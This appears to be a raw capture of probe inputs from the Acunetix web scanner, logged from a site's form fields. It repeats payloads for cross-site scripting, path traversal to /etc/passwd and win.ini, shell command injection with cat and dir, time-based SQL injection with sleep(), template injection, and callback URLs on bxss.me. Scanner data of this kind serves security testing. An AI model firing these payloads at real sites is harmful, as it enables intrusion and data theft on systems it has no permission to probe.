http://www.acunetix.tst

-1)

1

1

"|dir

file:///etc/passwd

1<div style=width:expression(prompt(906286))>

-1))

1

1

1

1

'"

jqY5nlPP'

1<iframe src='data:text/html

1

1'"()&%<ScRiPt >prompt(961169)</ScRiPt>

1

/\../\../\../\../\../\../\../etc/passwd

fDtHgoSc')

1<body onload=prompt(909770)>

1

<!--

1

1

t24qhW9K'))

'"()&%<ScRiPt >prompt(933011)</ScRiPt>

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(932475)>

1

WEB-INF/web.xml

1

1

1<img src=xyz OnErRor=prompt(909564)>

1

1_925146

-1

response.write(9937594*9977765)

1

WEB-INF\web.xml

1<img/src=">" onerror=alert(991590)>

-1)

'+response.write(9937594*9977765)+'

1

1<ScRiPt%20>prompt(940803)</sCripT>

1

"+response.write(9937594*9977765)+"

../../../../../../../../../../windows/win.ini

-1))

1

1

1&lt

1

1

HKWa6856'

../../../../../../../../../../boot.ini

1

M5i6Fc5s')

1

&cat /etc/passwd&

\xf6<img acu onmouseover=prompt(902942) //\xf6>

UAJ9I17k'))

1

../../../../../../../../../../windows/win.ini.jpg

1<input autofocus onfocus=prompt(945525)>

1

1

<a href='http://www.acunetix.com'>website security</a>

'&cat /etc/passwd&'

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

SomeCustomInjectedHeader:injected_by_wvs

[url=http://www.acunetix.com]website security[/url]

1

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

................windowswin.ini

SomeCustomInjectedHeader:injected_by_wvs

1_FQScb <ScRiPt >prompt(939152)</ScRiPt>

1

1

cat /etc/passwd

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1

`cat /etc/passwd`

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

../../../../../../../../../../etc/passwd

1

1

1

|cat /etc/passwd#

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

'|'ld

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

${99819+99832}

1

1

../../../../../../../../../../etc/passwd.jpg

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1&n929600=v991726

1some_inexistent_file_with_long_name%00.jpg

"|"ld

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

WEB-INF/web.xml

testasp.vulnweb.com

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

WEB-INF\web.xml

'

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

)

1

"

1

1

'"()

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

!(()&&!|*|*|

1

1

||cat /etc/passwd

^(#$!@#$)(()))******

acu9250\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9250

/etc/passwd

1

1

1

acux8426\xc0\xbez1\xc0\xbcz2a\x90bcxuca8426

1

1

1

&dir

1<ScRiPt >prompt(934009)</ScRiPt>

1

1

'

1

1

1

'&dir&'

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<script>prompt(994541)</script>

"

1

${@print(md5(acunetix_wvs_security_test))}

"&dir&"

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1<ScRiPt >prompt(950097)</ScRiPt>

${@print(md5(acunetix_wvs_security_test))}\

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?981779></ScRiPt>

|dir

1

1

1

1

http://hitv8nLDbQ4WG.bxss.me/

-1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

acunetix_wvs_invalid_filename

1

-1)

'|dir

1<ScRiPt >prompt(997998)</ScRiPt>

1

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

comments

1<video><source onerror="javascript:prompt(982095)">

1

"|dir

1

-1))

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(931992)"></g></svg>

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

1<div style=width:expression(prompt(961334))>

comments

'"

file:///etc/passwd

http://www.acunetix.tst

1

1<iframe src='data:text/html

1

1

bpIRRz3o'

1'"()&%<ScRiPt >prompt(929172)</ScRiPt>

<!--

comments/.

Wn8oH3mj')

1

/\../\../\../\../\../\../\../etc/passwd

1

1

'"()&%<ScRiPt >prompt(951588)</ScRiPt>

XShSWVbU'))

1

1<body onload=prompt(926930)>

1

WEB-INF/web.xml

1

1

1

1

1_933450

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(975147)>

1

-1

1

1

response.write(9745366*9479392)

1

WEB-INF\web.xml

1<img src=xyz OnErRor=prompt(957209)>

-1)

1

'+response.write(9745366*9479392)+'

1

1

../../../../../../../../../../windows/win.ini

1

-1))

1<img/src=">" onerror=alert(950459)>

1

"+response.write(9745366*9479392)+"

1

1<ScRiPt%20>prompt(932310)</sCripT>

1

VKpznMdZ'

1

&cat /etc/passwd&

1

../../../../../../../../../../boot.ini

1&lt

xFoQOSfi')

1

SomeCustomInjectedHeader:injected_by_wvs

1

PGxq6wLl'))

1

'&cat /etc/passwd&'

1

\xf6<img acu onmouseover=prompt(980992) //\xf6>

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../windows/win.ini.jpg

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1<input autofocus onfocus=prompt(968079)>

1

"&cat /etc/passwd&"

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

<a href='http://www.acunetix.com'>website security</a>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

cat /etc/passwd

1

1

1

[url=http://www.acunetix.com]website security[/url]

../../../../../../../../../../etc/passwd.jpg

1

................windowswin.ini

1

`cat /etc/passwd`

1_KejP5 <ScRiPt >prompt(993960)</ScRiPt>

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

..\..\..\..\..\..\..\..\windows\win.ini

1

${100184+100057}

|cat /etc/passwd#

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

'|'ld

1

1some_inexistent_file_with_long_name%00.jpg

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

acu1873\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1873

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

testasp.vulnweb.com

1

acux1904\xc0\xbez1\xc0\xbcz2a\x90bcxuca1904

"|"ld

1

1&n907631=v934236

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<ScRiPt >prompt(943780)</ScRiPt>

1

1

1

1

/etc/passwd

1<script>prompt(990658)</script>

1

1

1

1

1

'

)

WEB-INF/web.xml

1<ScRiPt >prompt(904805)</ScRiPt>

!(()&&!|*|*|

1

^(#$!@#$)(()))******

1

WEB-INF\web.xml

'"()

"

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?966134></ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1<ScRiPt >prompt(922353)</ScRiPt>

||cat /etc/passwd

1

1

1

1

1<video><source onerror="javascript:prompt(958344)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

&dir

1

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(944339)"></g></svg>

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'&dir&'

"

1

1

1<div style=width:expression(prompt(953280))>

1

acunetix_wvs_invalid_filename

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

${@print(md5(acunetix_wvs_security_test))}

1

1

1<iframe src='data:text/html

1

http://hitGp5EgH3Ljd.bxss.me/

comments

1

"&dir&"

${@print(md5(acunetix_wvs_security_test))}\

-1

file:///etc/passwd

1

comments

1

1<body onload=prompt(929706)>

1

1

-1)

comments/.

/\../\../\../\../\../\../\../etc/passwd

|dir

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1))

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(992013)>

1

1

1

'|dir

1

WEB-INF/web.xml

y6aT8vIz'

1

1

1

1<img src=xyz OnErRor=prompt(950118)>

08Dr3qDk')

http://www.acunetix.tst

1

1

'"

"|dir

WEB-INF\web.xml

1

1

<!--

V4uEo6wm'))

1<img/src=">" onerror=alert(954027)>

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1<ScRiPt%20>prompt(947022)</sCripT>

1

-1

1

1

1'"()&%<ScRiPt >prompt(919399)</ScRiPt>

1

1

-1)

../../../../../../../../../../boot.ini

1

1

1&lt

-1))

'"()&%<ScRiPt >prompt(946460)</ScRiPt>

1

1

\xf6<img acu onmouseover=prompt(908466) //\xf6>

../../../../../../../../../../windows/win.ini.jpg

381iYGjS'

1_956602

1

1<input autofocus onfocus=prompt(922698)>

ajRTsmMM')

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

blYxIThI'))

1

<a href='http://www.acunetix.com'>website security</a>

1

[url=http://www.acunetix.com]website security[/url]

................windowswin.ini

1

1

1_36eHU <ScRiPt >prompt(936984)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1

WEB-INF/web.xml

1

1

WEB-INF\web.xml

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

acu2419\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2419

1

acux7806\xc0\xbez1\xc0\xbcz2a\x90bcxuca7806

1

1<ScRiPt >prompt(988197)</ScRiPt>

1

1<script>prompt(979050)</script>

response.write(9087093*9127426)

1

'+response.write(9087093*9127426)+'

1<ScRiPt >prompt(964888)</ScRiPt>

1

"+response.write(9087093*9127426)+"

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?920508></ScRiPt>

1

1<ScRiPt >prompt(965719)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(973817)">

&cat /etc/passwd&

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(997888)"></g></svg>

1

1<div style=width:expression(prompt(911917))>

'&cat /etc/passwd&'

1

1

1<iframe src='data:text/html

1

1<body onload=prompt(916204)>

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(941008)>

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=xyz OnErRor=prompt(967776)>

SomeCustomInjectedHeader:injected_by_wvs

1

1<img/src=">" onerror=alert(911336)>

`cat /etc/passwd`

1

1

1

1<ScRiPt%20>prompt(999886)</sCripT>

1

|cat /etc/passwd#

1

1

1&lt

1

../../../../../../../../../../etc/passwd

1

'|'ld

1

1

\xf6<img acu onmouseover=prompt(936666) //\xf6>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

"|"ld

1<input autofocus onfocus=prompt(938988)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

${100258+99448}

1some_inexistent_file_with_long_name%00.jpg

../../../../../../../../../../etc/passwd.jpg

<a href='http://www.acunetix.com'>website security</a>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

[url=http://www.acunetix.com]website security[/url]

1

1&n958844=v915357

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

testasp.vulnweb.com

1_JS8V1 <ScRiPt >prompt(962058)</ScRiPt>

1

'

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

"

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1

||cat /etc/passwd

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

)

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

!(()&&!|*|*|

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

&dir

^(#$!@#$)(()))******

-1

/etc/passwd

'"()

1

'&dir&'

-1)

1

'

1

1

"

-1))

"&dir&"

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

XItnz4vW'

${@print(md5(acunetix_wvs_security_test))}

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

|dir

1

OIwG6GSE')

${@print(md5(acunetix_wvs_security_test))}\

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://hitii01hxwpJ6.bxss.me/

1

1

1

acunetix_wvs_invalid_filename

UvIAOeWt'))

1

1

'|dir

-1

comments

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

-1)

1

1

comments

1

-1))

http://www.acunetix.tst

1

1'"()&%<ScRiPt >prompt(902648)</ScRiPt>

'"

comments/.

"|dir

file:///etc/passwd

1

mWIXCxv4'

'"()&%<ScRiPt >prompt(994160)</ScRiPt>

<!--

1

response.write(9528971*9974864)

BWes0Qbf')

1_998176

1

/\../\../\../\../\../\../\../etc/passwd

1

7V53iUAn'))

'+response.write(9528971*9974864)+'

1

1

1

"+response.write(9528971*9974864)+"

1

1

1

WEB-INF/web.xml

1

1

1

&cat /etc/passwd&

1

1

1

WEB-INF\web.xml

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

../../../../../../../../../../boot.ini

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1

1

1

../../../../../../../../../../windows/win.ini.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

${99290+99241}

`cat /etc/passwd`

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

1some_inexistent_file_with_long_name%00.jpg

1

................windowswin.ini

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

testasp.vulnweb.com

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1&n937838=v914907

..\..\..\..\..\..\..\..\windows\win.ini

"|"ld

1

/etc/passwd

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1

'

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

)

1

!(()&&!|*|*|

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

^(#$!@#$)(()))******

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'"()

||cat /etc/passwd

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

acu10952\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10952

1

&dir

acux1783\xc0\xbez1\xc0\xbcz2a\x90bcxuca1783

WEB-INF/web.xml

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1<ScRiPt >prompt(938798)</ScRiPt>

'&dir&'

WEB-INF\web.xml

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

1<script>prompt(916922)</script>

1

"&dir&"

1

"

1

1<ScRiPt >prompt(975365)</ScRiPt>

${@print(md5(acunetix_wvs_security_test))}

1

1

file:///etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

|dir

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?978942></ScRiPt>

acunetix_wvs_invalid_filename

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

comments

'|dir

1<ScRiPt >prompt(949390)</ScRiPt>

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

comments

1

WEB-INF/web.xml

1

http://hitqnvOtaCa8c.bxss.me/

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

comments/.

"|dir

1

1<video><source onerror="javascript:prompt(986744)">

1

-1

1

1

WEB-INF\web.xml

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(990492)"></g></svg>

1

1

-1)

1

1

1

1

../../../../../../../../../../windows/win.ini

-1))

1

1<div style=width:expression(prompt(942778))>

1

1

1

1

1

0rSLjhWv'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

1<iframe src='data:text/html

../../../../../../../../../../boot.ini

1

1

1

1

1

HkJF1rio')

'"

1<body onload=prompt(959960)>

../../../../../../../../../../windows/win.ini.jpg

1

1'"()&%<ScRiPt >prompt(968901)</ScRiPt>

B5a5jR0o'))

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(964555)>

1

<!--

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

'"()&%<ScRiPt >prompt(915372)</ScRiPt>

-1

1

1

1<img src=xyz OnErRor=prompt(958065)>

1

1_954472

1

1

-1)

................windowswin.ini

1<img/src=">" onerror=alert(940243)>

-1))

1

1<ScRiPt%20>prompt(977987)</sCripT>

..\..\..\..\..\..\..\..\windows\win.ini

7C2gzoXP'

1LouHA3L')

1

1&lt

dMK21INc'))

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

\xf6<img acu onmouseover=prompt(924609) //\xf6>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<input autofocus onfocus=prompt(957692)>

1

<a href='http://www.acunetix.com'>website security</a>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

[url=http://www.acunetix.com]website security[/url]

1

1_iuBIG <ScRiPt >prompt(989771)</ScRiPt>

1

1

1

1

WEB-INF/web.xml

1

1

1

WEB-INF\web.xml

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

acu5355\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5355

acux7885\xc0\xbez1\xc0\xbcz2a\x90bcxuca7885

1

1

1<ScRiPt >prompt(933273)</ScRiPt>

1

1

1

1<script>prompt(981854)</script>

1

1<ScRiPt >prompt(932380)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?995761></ScRiPt>

1

1<ScRiPt >prompt(959066)</ScRiPt>

1

1<video><source onerror="javascript:prompt(928821)">

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(904089)"></g></svg>

1

1

1<div style=width:expression(prompt(925037))>

1

1

1<iframe src='data:text/html

1

1<body onload=prompt(908811)>

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(943280)>

1

1

1

1<img src=xyz OnErRor=prompt(906815)>

1<img/src=">" onerror=alert(957394)>

1

1<ScRiPt%20>prompt(952787)</sCripT>

1&lt

1

\xf6<img acu onmouseover=prompt(957580) //\xf6>

1<input autofocus onfocus=prompt(973316)>

<a href='http://www.acunetix.com'>website security</a>

1

[url=http://www.acunetix.com]website security[/url]

1_5P5ox <ScRiPt >prompt(917504)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

1

1